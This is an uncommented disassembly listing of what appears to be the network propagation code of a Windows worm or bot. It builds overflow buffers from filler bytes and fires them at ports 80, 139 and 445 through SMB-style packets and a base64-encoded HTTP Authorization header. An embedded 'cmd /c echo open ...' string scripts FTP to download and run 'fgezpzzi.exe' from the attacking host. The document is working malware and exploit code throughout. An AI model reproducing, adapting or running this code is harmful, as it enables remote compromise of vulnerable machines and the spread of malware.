var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 858h
push ebx
push edi
lea ecx, [ebp+var_48]
call sub_40CB2A
mov edi, 408h
cmp [ebp+arg_8], edi
jg loc_40D0F2
mov ebx, [ebp+arg_10]
lea eax, [ebx+8]
cmp eax, edi
ja loc_40D0F2
push esi
lea ecx, [ebp+var_30]
call sub_40CB2A
lea ecx, [ebp+var_20]
call sub_40CB2A
lea ecx, [ebp+var_50]
call sub_40CB2A
lea ecx, [ebp+var_18]
call sub_40CB2A
lea ecx, [ebp+var_40]
call sub_40CB2A
lea ecx, [ebp+var_38]
call sub_40CB2A
lea ecx, [ebp+var_28]
call sub_40CB2A
push 4
push offset dword_432030
lea ecx, [ebp+var_30]
call sub_40CCE2
push 3
push offset dword_432038
lea ecx, [ebp+var_30]
call sub_40CCE2
lea ecx, [ebp+var_30]
call sub_40CC68
lea ecx, [ebp+var_30]
call sub_40CD43
mov esi, 800h
lea eax, [ebp+Dst]
push esi ; Size
push 42h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea ecx, [ebp+var_20]
push 8
push offset aRbrbrbrb ; "BBBB"
call sub_40CCE2
push ebx
lea ecx, [ebp+var_20]
push [ebp+arg_C]
call sub_40CCE2
mov eax, 409h
lea ecx, [ebp+var_20]
sub eax, [ebp+var_1C]
push eax
lea eax, [ebp+Dst]
push eax
call sub_40CCE2
lea ecx, [ebp+var_20]
call sub_40CC68
push offset dword_4323B4 ; Str
lea ecx, [ebp+var_50]
call sub_40CD16
lea ecx, [ebp+var_50]
call sub_40CC68
push esi ; Size
lea eax, [ebp+Dst]
push 44h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
lea ecx, [ebp+var_58]
push 410h ; Size
push eax ; Src
call sub_40CB34
lea ecx, [ebp+var_58]
call sub_40CC68
push [ebp+var_54]
lea ecx, [ebp+var_50]
push [ebp+var_58]
call sub_40CD7F
lea ecx, [ebp+var_58]
call sub_40CBC3
push esi ; Size
lea eax, [ebp+Dst]
push 43h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_18]
call sub_40CD16
push 4
push offset dword_43203C
lea ecx, [ebp+var_18]
call sub_40CCE2
push [ebp+arg_8]
lea ecx, [ebp+var_18]
push [ebp+arg_4]
call sub_40CCE2
sub edi, [ebp+arg_8]
lea eax, [ebp+Dst]
lea ecx, [ebp+var_18]
push edi
push eax
call sub_40CCE2
lea ecx, [ebp+var_18]
call sub_40CC68
push [ebp+var_14]
lea ecx, [ebp+var_40]
push [ebp+var_18]
call sub_40CD33
push [ebp+var_4C]
lea ecx, [ebp+var_40]
push [ebp+var_50]
call sub_40CD33
lea ecx, [ebp+var_40]
call sub_40CD43
lea ecx, [ebp+var_18]
call sub_40CBC3
lea ecx, [ebp+var_50]
call sub_40CBC3
push [ebp+var_1C]
lea ecx, [ebp+var_38]
push [ebp+var_20]
call sub_40CD33
push [ebp+var_2C]
lea ecx, [ebp+var_38]
push [ebp+var_30]
call sub_40CD33
push [ebp+var_3C]
lea ecx, [ebp+var_38]
push [ebp+var_40]
call sub_40CD33
lea ecx, [ebp+var_38]
call sub_40CD43
lea ecx, [ebp+var_20]
call sub_40CBC3
lea ecx, [ebp+var_30]
call sub_40CBC3
lea ecx, [ebp+var_40]
call sub_40CBC3
push esi ; Size
lea eax, [ebp+Dst]
push 41h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
lea ecx, [ebp+var_28]
push 400h
push eax
call sub_40CCE2
lea ecx, [ebp+var_28]
call sub_40CC68
push 2
push offset dword_4323A8
lea ecx, [ebp+var_28]
call sub_40CCE2
push [ebp+var_34]
lea ecx, [ebp+var_28]
push [ebp+var_38]
call sub_40CD33
lea ecx, [ebp+var_28]
call sub_40CD43
lea ecx, [ebp+var_38]
call sub_40CBC3
lea ecx, [ebp+var_10]
call sub_40CB2A
lea ecx, [ebp+var_8]
call sub_40CB2A
push [ebp+var_24]
lea ecx, [ebp+var_10]
push [ebp+var_28]
call sub_40CD33
lea ecx, [ebp+var_10]
call sub_40CBDC
lea ecx, [ebp+var_28]
call sub_40CBC3
push offset dword_4323A4 ; Str
lea ecx, [ebp+var_8]
call sub_40CD16
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40CD33
lea ecx, [ebp+var_8]
call sub_40CBDC
lea ecx, [ebp+var_10]
call sub_40CBC3
push offset dword_4323A0 ; Str
lea ecx, [ebp+var_10]
call sub_40CD16
push [ebp+var_4]
lea ecx, [ebp+var_10]
push [ebp+var_8]
call sub_40CD33
lea ecx, [ebp+var_10]
call sub_40CBDC
lea ecx, [ebp+var_8]
call sub_40CBC3
push offset dword_432394 ; Str
lea ecx, [ebp+var_8]
call sub_40CD16
push [ebp+var_C]
lea ecx, [ebp+var_8]
push [ebp+var_10]
call sub_40CD33
lea ecx, [ebp+var_8]
call sub_40CBDC
lea ecx, [ebp+var_10]
call sub_40CBC3
push offset dword_432390 ; Str
lea ecx, [ebp+var_48]
call sub_40CD16
push [ebp+var_4]
lea ecx, [ebp+var_48]
push [ebp+var_8]
call sub_40CD33
lea ecx, [ebp+var_8]
call sub_40CBC3
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
pop esi
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
jmp short loc_40D100
; ---------------------------------------------------------------------------
loc_40D0F2: ; CODE XREF: sub_40CD9E+1B�j
; sub_40CD9E+29�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_48]
mov [eax], ecx
mov ecx, [ebp+var_44]
mov [eax+4], ecx
loc_40D100: ; CODE XREF: sub_40CD9E+352�j
pop edi
pop ebx
leave
retn
sub_40CD9E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D104 proc near ; CODE XREF: sub_40D1C8+A1�p
; sub_40D1C8+C2�p ...
var_210 = dword ptr -210h
var_20C = dword ptr -20Ch
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 210h
push esi
push edi
mov esi, [ebp+arg_0]
push 1
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_210]
and [ebp+var_4], 0
push eax
lea eax, [ebp+var_10C]
push 0
push eax
lea eax, [esi+1]
push eax
mov [ebp+var_108], esi
mov [ebp+var_10C], edi
mov [ebp+var_20C], esi
mov [ebp+var_210], edi
mov [ebp+var_8], 0Ah
call ds:dword_42720C ; select
cmp eax, edi
jnz short loc_40D16B
lea eax, [ebp+var_10C]
push eax
push esi
call sub_426350 ; __WSAFDIsSet
test eax, eax
jnz short loc_40D16F
loc_40D16B: ; CODE XREF: sub_40D104+54�j
xor eax, eax
jmp short loc_40D17F
; ---------------------------------------------------------------------------
loc_40D16F: ; CODE XREF: sub_40D104+65�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call dword_4CB9EC ; recv
loc_40D17F: ; CODE XREF: sub_40D104+69�j
pop edi
pop esi
leave
retn
sub_40D104 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D183 proc near ; CODE XREF: sub_40D1C8+81�p
; sub_40D1C8+AB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push [ebp+arg_8]
call dword_4CB9D0 ; htonl
mov [ebp+var_4], eax
push 0
lea eax, [ebp+var_4]
push 4
push eax
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, 4
jz short loc_40D1AD
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D1AD: ; CODE XREF: sub_40D183+24�j
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4CBA24 ; send
sub eax, [ebp+arg_8]
neg eax
sbb eax, eax
inc eax
leave
retn
sub_40D183 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40D1C8(int,void *Src,size_t Size)
sub_40D1C8 proc near ; CODE XREF: sub_40D2A2+48�p
; .text:0040D716�p
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push ebx
push esi
push edi
mov edi, [ebp+Size]
lea ebx, [edi+41h]
push ebx ; Size
mov [ebp+var_4], ebx
call _malloc
mov esi, eax
pop ecx
test esi, esi
jnz short loc_40D1F1
xor al, al
jmp loc_40D29D
; ---------------------------------------------------------------------------
loc_40D1F1: ; CODE XREF: sub_40D1C8+20�j
push ebx ; Size
push 0 ; Val
push esi ; Dst
call _memset
push 2Fh ; Size
push offset dword_4320CC ; Src
push esi ; Dst
call _memcpy
push 8 ; Size
lea eax, [esi+31h]
push offset dword_4320FC ; Src
push eax ; Dst
mov [esi+2Fh], di
call _memcpy
push edi ; Size
lea ebx, [esi+3Bh]
push [ebp+Src] ; Src
mov [esi+39h], di
push ebx ; Dst
call _memcpy
push 6 ; Size
add ebx, edi
push offset dword_4CE6EC ; Src
push ebx ; Dst
call _memcpy
mov ebx, [ebp+arg_0]
push 85h
push offset dword_432044
push ebx
call sub_40D183
add esp, 48h
test al, al
jnz short loc_40D259
loc_40D255: ; CODE XREF: sub_40D1C8+B5�j
xor bl, bl
jmp short loc_40D294
; ---------------------------------------------------------------------------
loc_40D259: ; CODE XREF: sub_40D1C8+8B�j
mov edi, 100h
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40D104
push [ebp+var_4]
push esi
push ebx
call sub_40D183
add esp, 1Ch
test al, al
jz short loc_40D255
push 0
lea eax, [ebp+var_104]
push edi
push eax
push ebx
call sub_40D104
add esp, 10h
mov bl, 1
loc_40D294: ; CODE XREF: sub_40D1C8+8F�j
push esi
call sub_41BA91
pop ecx
mov al, bl
loc_40D29D: ; CODE XREF: sub_40D1C8+24�j
pop edi
pop esi
pop ebx
leave
retn
sub_40D1C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40D2A2(int,void *Src,size_t Size)
sub_40D2A2 proc near ; CODE XREF: .text:0040D6FC�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
Src = dword ptr 0Ch
Size = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
push 0
push 48h
push offset unk_432108
push [ebp+arg_0]
call ds:dword_427208 ; send
cmp eax, 48h
jnz short loc_40D2DD
push 0
lea eax, [ebp+var_20]
push 20h
push eax
push [ebp+arg_0]
call sub_40D104
add esp, 10h
cmp eax, 0FFFFFFFFh
jz short loc_40D2DD
cmp [ebp+var_20], 82h
jz short loc_40D2E1
loc_40D2DD: ; CODE XREF: sub_40D2A2+1B�j
; sub_40D2A2+33�j
xor al, al
leave
retn
; ---------------------------------------------------------------------------
loc_40D2E1: ; CODE XREF: sub_40D2A2+39�j
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push [ebp+arg_0] ; int
call sub_40D1C8
add esp, 0Ch
leave
retn
sub_40D2A2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D2F4 proc near ; CODE XREF: sub_40D340+2D�p
var_10 = qword ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
and dword ptr [ebp+var_8+4], 0
shl eax, 3
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
fmul ds:dbl_427670
call __ftol
and dword ptr [ebp+var_8+4], 0
mov dword ptr [ebp+var_8], eax
fild [ebp+var_8]
push ecx
push ecx ; double
fst [ebp+var_8]
fmul ds:dbl_427668
fstp [esp+10h+var_10]
call _floor
fadd st, st
pop ecx
pop ecx
fadd [ebp+var_8]
call __ftol
inc eax
leave
retn
sub_40D2F4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40D340(int,int,__int16,char *Str)
sub_40D340 proc near ; CODE XREF: sub_40D4E2+24�p
var_4C = qword ptr -4Ch
var_38 = byte ptr -38h
var_2C = dword ptr -2Ch
var_28 = qword ptr -28h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_10 = byte ptr -10h
var_F = byte ptr -0Fh
var_E = byte ptr -0Eh
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_B = byte ptr 13h
Src = dword ptr 14h
mov eax, offset loc_426AA7
call __EH_prolog
sub esp, 2Ch
mov al, [ebp+arg_B]
push ebx
push esi
push edi
xor edi, edi
lea ecx, [ebp+var_38]
push edi
mov [ebp+var_20], edi
mov [ebp+var_38], al
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)
push 1
pop ebx
push dword ptr [ebp+10h]
mov [ebp+var_4], ebx
call sub_40D2F4
cmp [ebp+var_2C], eax
pop ecx
jnb short loc_40D382
push edi
push eax
lea ecx, [ebp+var_38]
call ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Grow(uint,bool)
loc_40D382: ; CODE XREF: sub_40D340+36�j
cmp [ebp+10h], edi
mov [ebp+var_18], edi
jbe loc_40D49F
mov ebx, [ebp+10h]
loc_40D391: ; CODE XREF: sub_40D340+156�j
cmp dword ptr [ebp+10h], 3
jb short loc_40D39B
push 3
jmp short loc_40D3AD
; ---------------------------------------------------------------------------
loc_40D39B: ; CODE XREF: sub_40D340+55�j
cmp dword ptr [ebp+10h], 2
jnz short loc_40D3A5
push 2
jmp short loc_40D3AD
; ---------------------------------------------------------------------------
loc_40D3A5: ; CODE XREF: sub_40D340+5F�j
cmp dword ptr [ebp+10h], 1
jnz short loc_40D3AE
push 1
loc_40D3AD: ; CODE XREF: sub_40D340+59�j
; sub_40D340+63�j
pop ebx
loc_40D3AE: ; CODE XREF: sub_40D340+69�j
mov dword ptr [ebp+var_28], ebx
mov dword ptr [ebp+var_28+4], edi
fild [ebp+var_28]
push ecx
push ecx ; double
fmul ds:dbl_427680
fstp [esp+4Ch+var_4C]
call _ceil
pop ecx
pop ecx
call __ftol
cmp ebx, edi
mov [ebp+var_1C], eax
jbe short loc_40D3ED
mov esi, [ebp+arg_4]
mov ecx, ebx
mov edx, ecx
lea edi, [ebp+var_10]
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
xor edi, edi
loc_40D3ED: ; CODE XREF: sub_40D340+93�j
mov cl, [ebp+var_10]
mov dl, [ebp+var_10]
sar cl, 2
and cl, 3Fh
and dl, 3
mov [ebp+var_14], cl
mov cl, [ebp+var_F]
sar cl, 4
and cl, 0Fh
add [ebp+arg_4], ebx
shl dl, 4
add cl, dl
mov dl, [ebp+var_F]
mov [ebp+var_13], cl
mov cl, [ebp+var_E]
sar cl, 6
and dl, 0Fh
sub [ebp+10h], ebx
and cl, 3
xor esi, esi
shl dl, 2
add cl, dl
mov [ebp+var_12], cl
mov cl, [ebp+var_E]
and cl, 3Fh
cmp eax, edi
mov [ebp+var_11], cl
jbe short loc_40D45B
add [ebp+var_18], eax
loc_40D43F: ; CODE XREF: sub_40D340+119�j
movsx eax, [ebp+esi+var_14]
lea ecx, [ebp+var_38]
mov al, byte_432154[eax]
push eax ; char
push 1 ; Size
call ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char)
inc esi
cmp esi, [ebp+var_1C]
jb short loc_40D43F
loc_40D45B: ; CODE XREF: sub_40D340+FA�j
cmp [ebp+var_18], 48h
jb short loc_40D479
push [ebp+Src] ; Str
call _strlen
pop ecx
push eax ; Size
lea ecx, [ebp+var_38]
push [ebp+Src] ; Src
call sub_40D7CD
mov [ebp+var_18], edi
loc_40D479: ; CODE XREF: sub_40D340+11F�j
push 4
pop esi
cmp [ebp+var_1C], esi
jnb short loc_40D493
sub esi, [ebp+var_1C]
loc_40D484: ; CODE XREF: sub_40D340+151�j
push 3Dh ; char
push 1 ; Size
lea ecx, [ebp+var_38]
call ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char)
dec esi
jnz short loc_40D484
loc_40D493: ; CODE XREF: sub_40D340+13F�j
cmp [ebp+10h], edi
ja loc_40D391
push 1
pop ebx
loc_40D49F: ; CODE XREF: sub_40D340+48�j
mov esi, [ebp+arg_0]
mov al, [ebp+var_38]
push edi
mov ecx, esi
mov [esi], al
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)
push ds:dword_427678
lea eax, [ebp+var_38]
mov ecx, esi
push edi
push eax
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint)
mov [ebp+var_20], ebx
and byte ptr [ebp+var_4], 0
push ebx
lea ecx, [ebp+var_38]
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)
mov ecx, [ebp+var_C]
mov eax, esi
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40D340 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D4E2 proc near ; CODE XREF: .text:0040D6DF�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
arg_C = byte ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
mov eax, offset sub_426AC4
call __EH_prolog
sub esp, 10h
push ebx
push esi
push edi
push offset byte_43DB88 ; Str
lea eax, [ebp+var_1C]
push dword ptr [ebp+arg_8] ; __int16
xor ebx, ebx
mov [ebp+var_4], ebx
push [ebp+arg_4] ; int
push eax ; int
call sub_40D340
mov eax, [ebp+arg_14]
mov ecx, [ebp+var_14]
mov byte ptr [ebp+var_4], 1
lea esi, [ecx+eax+36h]
push esi ; Size
call _malloc
mov edi, eax
add esp, 14h
cmp edi, ebx
jnz short loc_40D52C
xor bl, bl
jmp short loc_40D570
; ---------------------------------------------------------------------------
loc_40D52C: ; CODE XREF: sub_40D4E2+44�j
mov ecx, [ebp+var_18]
mov eax, offset dword_427688
cmp ecx, ebx
jnz short loc_40D53A
mov ecx, eax
loc_40D53A: ; CODE XREF: sub_40D4E2+54�j
cmp [ebp+arg_10], ebx
jz short loc_40D542
mov eax, [ebp+arg_10]
loc_40D542: ; CODE XREF: sub_40D4E2+5B�j
push ecx
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi ; Count
push edi ; Dest
call __snprintf
add esp, 14h
push ebx
push esi
push edi
push [ebp+arg_0]
call dword_4CBA24 ; send
cmp eax, esi
jz short loc_40D567
xor bl, bl
jmp short loc_40D569
; ---------------------------------------------------------------------------
loc_40D567: ; CODE XREF: sub_40D4E2+7F�j
mov bl, 1
loc_40D569: ; CODE XREF: sub_40D4E2+83�j
push edi
call sub_41BA91
pop ecx
loc_40D570: ; CODE XREF: sub_40D4E2+48�j
and byte ptr [ebp+var_4], 0
push 1
lea ecx, [ebp+var_1C]
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)
or [ebp+var_4], 0FFFFFFFFh
push 1
lea ecx, [ebp+arg_C]
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)
mov ecx, [ebp+var_C]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40D4E2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 420h
and byte ptr [ebp-420h], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp-41Fh]
push 8Fh
rep stosd
stosw
stosb
lea eax, [ebp-420h]
push offset dword_432300
push eax
call _memcpy
add esp, 0Ch
mov eax, offset Str ; "fgezpzzi.exe"
push eax
push eax
movzx eax, word ptr dword_4CB710
push eax
push dword ptr [ebp+8]
call sub_40AA06
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "...
lea eax, [ebp-391h]
push 400h
push eax
call __snprintf
add eax, 90h
push eax
lea eax, [ebp-420h]
push eax
push 164h
lea eax, [ebp-8]
push offset aSvwfbA ; "SVWfì€"
push eax
call sub_40CD9E
xor esi, esi
add esp, 30h
cmp [ebp-4], esi
jnz short loc_40D63B
xor eax, eax
jmp loc_40D767
; ---------------------------------------------------------------------------
loc_40D63B: ; CODE XREF: .text:0040D632�j
mov [ebp-0Ch], esi
loc_40D63E: ; CODE XREF: .text:0040D73E�j
test esi, esi
jnz loc_40D744
push 6
push 1
push 2
call ds:dword_427204 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40D72C
xor eax, eax
lea edi, [ebp-1Ah]
stosd
push dword ptr [ebp+0A8h]
stosd
stosd
stosw
mov word ptr [ebp-1Ch], 2
call dword_4CB9D4 ; htons
mov [ebp-1Ah], ax
lea eax, [ebp+0Ch]
push eax
call dword_4CBA14 ; inet_addr
mov [ebp-18h], eax
lea eax, [ebp-1Ch]
push 10h
push eax
push ebx
call dword_4CB97C ; connect
cmp eax, 0FFFFFFFFh
jz loc_40D721
cmp dword ptr [ebp+0A8h], 50h
jnz short loc_40D6E9
mov al, [ebp+0C3h]
sub esp, 10h
mov esi, esp
mov [ebp-20h], esp
push 0
mov ecx, esi
mov [esi], al
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)
lea eax, [ebp+0Ch]
push eax
call _strlen
pop ecx
push eax
lea eax, [ebp+0Ch]
push eax
mov ecx, esi
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *,uint)
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40D4E2
add esp, 1Ch
jmp short loc_40D71E
; ---------------------------------------------------------------------------
loc_40D6E9: ; CODE XREF: .text:0040D6A7�j
cmp dword ptr [ebp+0A8h], 8Bh
jnz short loc_40D703
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40D2A2
jmp short loc_40D71B
; ---------------------------------------------------------------------------
loc_40D703: ; CODE XREF: .text:0040D6F3�j
cmp dword ptr [ebp+0A8h], 1BDh
jnz short loc_40D721
push dword ptr [ebp-4]
push dword ptr [ebp-8]
push ebx
call sub_40D1C8
loc_40D71B: ; CODE XREF: .text:0040D701�j
add esp, 0Ch
loc_40D71E: ; CODE XREF: .text:0040D6E7�j
movzx esi, al
loc_40D721: ; CODE XREF: .text:0040D69A�j
; .text:0040D70D�j
push ebx
call dword_4CBA6C ; closesocket
test esi, esi
jnz short loc_40D737
loc_40D72C: ; CODE XREF: .text:0040D657�j
push 3E8h
call ds:dword_427080 ; Sleep
loc_40D737: ; CODE XREF: .text:0040D72A�j
inc dword ptr [ebp-0Ch]
cmp dword ptr [ebp-0Ch], 2
jl loc_40D63E
loc_40D744: ; CODE XREF: .text:0040D640�j
lea ecx, [ebp-8]
call sub_40CBC3
test esi, esi
jz short loc_40D765
mov eax, [ebp+0B0h]
shl eax, 6
inc dword_431800[eax]
lea eax, dword_431800[eax]
loc_40D765: ; CODE XREF: .text:0040D74E�j
mov eax, esi
loc_40D767: ; CODE XREF: .text:0040D636�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426A88
loc_40D76C: ; CODE XREF: sub_426A88+3�j
; sub_426A90+11�j ...
push 1
call ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool)
retn
; END OF FUNCTION CHUNK FOR sub_426A88
; [00000059 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::append(uint,char). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40D7CD(void *Src,size_t Size)
sub_40D7CD proc near ; CODE XREF: sub_40D340+131�p
Src = dword ptr 4
Size = dword ptr 8
mov eax, ds:dword_427678
push ebx
mov ebx, [esp+4+Size]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40D7E7
call sub_42629A
loc_40D7E7: ; CODE XREF: sub_40D7CD+13�j
test ebx, ebx
jbe short loc_40D81C
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Grow(uint,bool)
test al, al
jz short loc_40D81C
mov eax, [esi+8]
push ebx ; Size
push [esp+10h+Src] ; Src
add eax, [esi+4]
push eax ; Dst
call _memcpy
mov eax, [esi+4]
add esp, 0Ch
mov [esi+8], edi
and byte ptr [edi+eax], 0
loc_40D81C: ; CODE XREF: sub_40D7CD+1C�j
; sub_40D7CD+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40D7CD endp
; [000000CE BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(std::basic_string<char,std::char_traits<char>,std::allocator<char>> const &,uint,uint). PRESS KEYPAD "+" TO EXPAND]
; [00000085 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Grow(uint,bool). PRESS KEYPAD "+" TO EXPAND]
; [0000003C BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Tidy(bool). PRESS KEYPAD "+" TO EXPAND]
; [00000035 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *,uint). PRESS KEYPAD "+" TO EXPAND]
; [00000067 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::erase(uint,uint). PRESS KEYPAD "+" TO EXPAND]
; [000000BD BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Copy(uint). PRESS KEYPAD "+" TO EXPAND]
; [00000030 BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::_Split(void). PRESS KEYPAD "+" TO EXPAND]
; [00000021 BYTES: COLLAPSED FUNCTION unknown_libname_1. PRESS KEYPAD "+" TO EXPAND]
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB5E proc near ; CODE XREF: .text:0040DF74�p
Dest = word ptr -354h
var_34E = byte ptr -34Eh
Source = word ptr -124h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 354h
push ebx
push esi
push edi
mov esi, offset off_432948
lea edi, [ebp+var_C]
mov ecx, 8Ah
movsd
movsd
movsd
mov esi, offset asc_432940 ; "\\\\"
lea edi, [ebp+Dest]
movsd
movsw
xor eax, eax
lea edi, [ebp+var_34E]
rep stosd
stosw
mov al, byte_43DB88
push 45h
mov byte ptr [ebp+Source], al
pop ecx
xor eax, eax
lea edi, [ebp+Source+1]
rep stosd
stosw
stosb
lea eax, [ebp+Source]
push 0FFh
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
xor edi, edi
push edi
push edi
call ds:dword_4270E8 ; MultiByteToWideChar
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _wcscat
lea eax, [ebp+var_C]
